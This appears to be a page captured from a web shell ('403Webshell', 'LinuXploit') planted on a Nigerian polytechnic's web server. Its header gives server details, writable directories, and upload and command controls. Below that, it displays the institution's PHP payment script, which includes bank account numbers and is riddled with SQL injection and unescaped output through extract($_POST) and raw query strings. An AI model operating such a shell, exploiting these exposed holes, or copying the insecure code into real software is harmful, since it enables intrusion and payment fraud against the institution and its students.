403Webshell
Server IP : 172.64.80.1  /  Your IP : 172.70.127.136
Web Server : Apache
System : Linux mail.federalpolyede.edu.ng 5.10.0-32-amd64 #1 SMP Debian 5.10.223-1 (2024-08-10) x86_64
User : federalpolyede.edu.ng_idh35skikv ( 10000)
PHP Version : 7.4.33
Disable Function : opcache_get_status
MySQL : OFF  |  cURL : ON  |  WGET : OFF  |  Perl : OFF  |  Python : OFF  |  Sudo : OFF  |  Pkexec : OFF
Directory :  /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/

Upload File :
current_dir [ Writeable ] document_root [ Writeable ]

 

Command :

[ Back ]     

Current File : /var/www/vhosts/federalpolyede.edu.ng/httpdocs_backup/entranceform/postjson_question.php
<?php
ob_start();

include('headMain2.php');
extract($_POST);
/**
 * Created by PhpStorm.
 * User: adisa
 * Date: 3/2/2016
 * Time: 3:31 PM
 */
//session_start();

require('../connect.php');
$db=db_connect();
$_SESSION['payerName']=$payerName;
$_SESSION['payerID']=$_SESSION['idNo']=$regNo=$idNo;
$_SESSION['payerEmail']=$payerEmail;
$_SESSION['payerPhone']=$payerPhone;
$_SESSION['amount']=$amt;

$ptype1=explode(',',$_POST['ptype']);
$paymentType=$_SESSION['paymentTYPE']=$ptype1[0];

$specialAspoa="select * from paymentspecial where paymentName='$paymentType'";
$specialAspoaQuery=$db->query($specialAspoa);
if ($specialAspoaQuery->rowCount()==1){
    $specialAspoa_fetch=$specialAspoaQuery->fetch(PDO::FETCH_BOTH);
    $_SESSION['amount']=$specialAspoa_fetch['typeCost'];
//     $_SESSION['charges']=$specialAspoa_fetch['typecharges'];
//     $_SESSION['totalAmount']=$specialAspoa_fetch['totalAmount'];
//    die();
}
// $paymentType=$_SESSION['ptype'];

?>
<br>

<div class="col-lg-8 col-lg-offset-2">
    <div class="form-group">
        <label class="col-sm-4 control-label">Payer Name</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['payerName']  ;?>"  name="name" >
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Payer Email</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['payerEmail'];?>" name="email" >
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Payer Phone</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['payerPhone'] ;?>" name="phone" >
        </div>
    </div>
    <div class="form-group">
        <label class="col-sm-4 control-label">Amount</label>
        <div class="col-sm-8">
            <input type="text" class="form-control" value="<?php echo $_SESSION['amount'] ;?>" name="f_amount" disabled="disabled">
        </div>
    </div>

    <?php
    include 'remita_contants_split.php';
    $totalAmount = $_SESSION['amount'];



        $servicetypeId = SERVICETYPEID_SCR;



    //echo $servicetypeId;
    $id=substr($payerPhone,8);
    //$id=1;
    $timesammp=DATE("dmyHis");
    if ($id<10){
        $id='0000'.$id;
    }else if($id<100){
        $id='000'.$id;
    }else if($id<1000){
        $id='00'.$id;
    }else if($id<10000){
        $id='0'.$id;
    }else{
        $id=$id;
    }
    $orderID=mt_rand(10000, 99999).$id.'0';
    //die($orderID);
    $payerName = $_POST["payerName"];
    $payerEmail = $_POST["payerEmail"];
    $payerPhone = $_POST["payerPhone"];
    $responseurl = PATH . "/new-receipt-otherPayment.php";
    //$hash_string = MERCHANTID . $servicetypeId . $orderID . $totalAmount . $responseurl . APIKEY;
    $hash_string = MERCHANTID . $servicetypeId . $orderID . $totalAmount . $responseurl . APIKEY;
    $hash = hash('sha512', $hash_string);
    $itemtimestamp = $timesammp;
    $itemid1="itemid1";
    $itemid2="34444".$itemtimestamp;
    $itemid3="8694".$itemtimestamp;

    $beneficiaryName="Federal Polytechnic Ede";
    $beneficiaryAccount="0280451361018";
    $bankCode="000";

//    $beneficiaryName2="OMEGA PLUS SOLUTIONS LIMITED";
//    $beneficiaryAccount2="0119947297";
//    $bankCode2="058";
    $beneficiaryName2="ICT SERVICES STAFF WELFARE FEDERAL POLYTECHNIC EDE";
    $beneficiaryAccount2="1140137729";
    $bankCode2="076";

    $beneficiaryAmount =$_SESSION['amount']=200;
    $beneficiaryAmount2 =$_SESSION['charges']=800;
    $deductFeeFrom=1;
    $deductFeeFrom2=0;

    $content = '{"merchantId":"'. MERCHANTID
        .'"'.',"serviceTypeId":"'.$servicetypeId
        .'"'.",".'"totalAmount":"'.$totalAmount
        .'","hash":"'. $hash
        .'"'.',"orderId":"'.$orderID
        .'"'.",".'"responseurl":"'.$responseurl
        .'","payerName":"'. $payerName
        .'"'.',"payerEmail":"'.$payerEmail
        .'"'.",".'"payerPhone":"'.$payerPhone
        .'","lineItems":[
{"lineItemsId":"'.$itemid1.'","beneficiaryName":"'.$beneficiaryName.'","beneficiaryAccount":"'.$beneficiaryAccount.'","bankCode":"'.$bankCode.'","beneficiaryAmount":"'.$beneficiaryAmount.'","deductFeeFrom":"'.$deductFeeFrom.'"},
{"lineItemsId":"'.$itemid2.'","beneficiaryName":"'.$beneficiaryName2.'","beneficiaryAccount":"'.$beneficiaryAccount2.'","bankCode":"'.$bankCode2.'","beneficiaryAmount":"'.$beneficiaryAmount2.'","deductFeeFrom":"'.$deductFeeFrom2.'"}
]}';
    $curl = curl_init(GATEWAYURL);
    curl_setopt($curl, CURLOPT_HEADER, false);
    curl_setopt($curl, CURLOPT_RETURNTRANSFER, true);
    curl_setopt($curl, CURLOPT_HTTPHEADER,
        array("Content-type: application/json"));
    curl_setopt($curl, CURLOPT_POST, true);
    curl_setopt($curl, CURLOPT_POSTFIELDS, $content);

    curl_setopt($curl, CURLOPT_SSL_VERIFYPEER, false);
    $json_response = curl_exec($curl);
    $status = curl_getinfo($curl, CURLINFO_HTTP_CODE);
    curl_close($curl);
     $jsonData = substr($json_response, 6, -1);
     $response = json_decode($jsonData, true);
    $statuscode = $response['statuscode'];
    $statusMsg = $response['status'];


    if($statuscode=='025'){
        $rrr = trim($response['RRR']);
        $new_hash_string = MERCHANTID . $rrr . APIKEY;
        $new_hash = hash('sha512', $new_hash_string);

        echo '<html>
<head>
<link rel="stylesheet" href="css/bootstrap.min.css">
<link rel="stylesheet" href="css/bootstrap-dark.min.css">
</head>
<style type="text/css">
        body {
            background-color: #CFD1DE;
            background-image: url(../images/logo2fade.png);
        }
    </style>
<body>


<form action="'.GATEWAYRRRPAYMENTURL.'" method="POST">
<input id="merchantId" name="merchantId" value="'.MERCHANTID.'" type="hidden"/>
<input id="rrr" name="rrr" value="'.$rrr.'" type="hidden"/>
<input id="responseurl" name="responseurl" value="'.$responseurl.'" type="hidden"/>
<input id="hash" name="hash" value="'.$new_hash.'" type="hidden"/>
<div class="form-group">
	<label class="col-sm-4 control-label">Payment Type</label>
	<div class="col-sm-8">

		<select name="paymenttype" class="form-control">
			<option value=""> -- Select --</option>
			<option value="REMITA_PAY"> Remita Account Transfer</option>
			<option value="Interswitch"> Verve Card</option>
			<option value="UPL"> Visa</option>
			<option value="UPL"> MasterCard</option>
			<option value="PocketMoni"> PocketMoni</option>
			<option value="RRRGEN"> POS</option>
			<option value="ATM"> ATM</option>
			<option value="BANK_BRANCH">BANK BRANCH</option>
			<option value="BANK_INTERNET">BANK INTERNET</option>
		</select>
	</div>
</div>

 <div class="form-group">
	<div class="col-sm-8 col-sm-offset-4">
		<input type="submit" class="btn btn-sm btn-primary" name="submit" value="Submit" />
	</div>
</div>
	</form>


</div>

</body>
</html>';
        //echo "Here _o";

//    echo "Here";
        require('../filetoU/logFile.php');
        $logD='OrderID: '.$orderID.' PaymentType: '.$paymentType;
        logDetail($idNo,$logD);
        $ip2=$_SERVER['HTTP_X_FORWARDED_FOR'];
        $ip1=$_SERVER['REMOTE_ADDR'];
//    $amount=$amount-100;
        $aspoaQuery="INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`descr`,`pay_session`) VALUES  (NULL, '$orderID', '0', CURRENT_TIMESTAMP , '-1', '$regNo', 'Not Yet Approved', '$amt', '$paymentType', 'False','$ip1','$ip2','$pdis','2022/2023')";
        $db->query($aspoaQuery);
        $aspoa="INSERT INTO `fedpoly`.`remitaorder_2` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`descr`,`pay_session`) VALUES  (NULL, '$orderID', '0', '0', '-1', '$regNo', 'Not Yet Approved', '$amt', '$paymentType', 'False','$ip1','$ip2','$pdis','2022/2023')";
        $db->query($aspoa);
//    die();
        // $db->query("INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `dateCreated`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`, `bankCode`, `channnel`, `branchCode`, `datesent`, `daterequested`, `clientIP`, `clientProxy`, `descr`, `status`, `pay_session`) VALUES (NULL, '$orderID', '0', '0', CURRENT_TIMESTAMP, '-1', '$formNo', 'Not Yet Approved', '7', '8', '9', '0', '1', '2', '1', '2', '3', '4', '5', '6', '5')");

        //  echo "INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`pay_session`) VALUES (NULL, '$orderID', '0', '0', '-1', '$formNo', 'Not Yet Approved', '$amount', '$paymentType', 'False','$ip1','$ip2','2017/2018')";


//    $db->query("UPDATE `fedpoly`.`admitted` SET `email` = '$payerEmail',`gsm` = '$payerPhone',`acceptance`=1 WHERE `admitted`.`formNo` = '$formNo'");

        //  echo "Here";
//    ================ other payment table===================

        $sql="select * from otherpayment where idNo='$regNo'";
        $result=$db->query($sql);
        $num=$result->rowCount();
        if ($num>0){
//    die("here");
//    $dd="UPDATE `fedpoly`.`otherpayment` SET `names` = '$payerName',`email` = '$payerEmail',`phone` = '$payerPhone',`descr` = '$desc',`orderID` = '$orderID' WHERE `otherpayment`.`idNo` ='$idNo' and (`names`='' OR `names`='.')"
//	$db->query($dd);
            $princess=$db->prepare("UPDATE `fedpoly`.`otherpayment` SET `names` = ?,`email` = ?,`phone` = ?,`descr` = ?,`orderID` = ? WHERE `otherpayment`.`idNo` =? and (`names`='' OR `names`='.')");
            $princess->execute([$payerName,$payerEmail,$payerPhone,$pdis,$orderID,$regNo]);
        }else{
            $payerName=str_replace("'","''",$payerName);
            $desc="Payment of eQuestion";
            $db->query("INSERT INTO `fedpoly`.`otherpayment` (`sn`, `idNo`, `names`, `email`, `phone`,`descr`,`orderID`) VALUES (NULL, '$regNo', '$payerName', '$payerEmail', '$payerPhone','$desc','$orderID')");
        }
//    ===================end of other payment================================================================


    }else{
//    require('../connect.php');
//$db=db_connect();
//        $db->query("INSERT INTO `fedpoly`.`remitaorder` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`pay_session`) VALUES  (NULL, '$orderID', '0', '0', '-1', '$formNo', 'Not Yet Approved', '$amount', '$paymentType', 'False','$ip1','$ip2','2019/2020')");
//        echo $aspoa="INSERT INTO `fedpoly`.`remitaorder_2` (`sn`, `orderID`, `remitaRRR`, `transDate`, `transStatus`, `regNo`, `transDetail`, `amtPaid`, `paymentType`, `transApproved`,`clientIP`,`clientProxy`,`pay_session`) VALUES  (NULL, '$orderID', '0', '0', '-1', '$formNo', 'Not Yet Approved', '$amtc', '$paymentType', 'False','$ip1','$ip2','2019/2020')";
//        $db->query($aspoa);
        echo $statuscode;
//    echo $beneficiaryAmount2;

        echo "Error Generating RRR - " .$statusMsg;
        echo $statuscode. '<h2>Kindly exercise patient, the error will be rectified as soon as possible. Thanks</h2>';
        echo $statusMsg;
    }

    ?>
</div>

Youez - 2016 - github.com/yon3zu
LinuXploit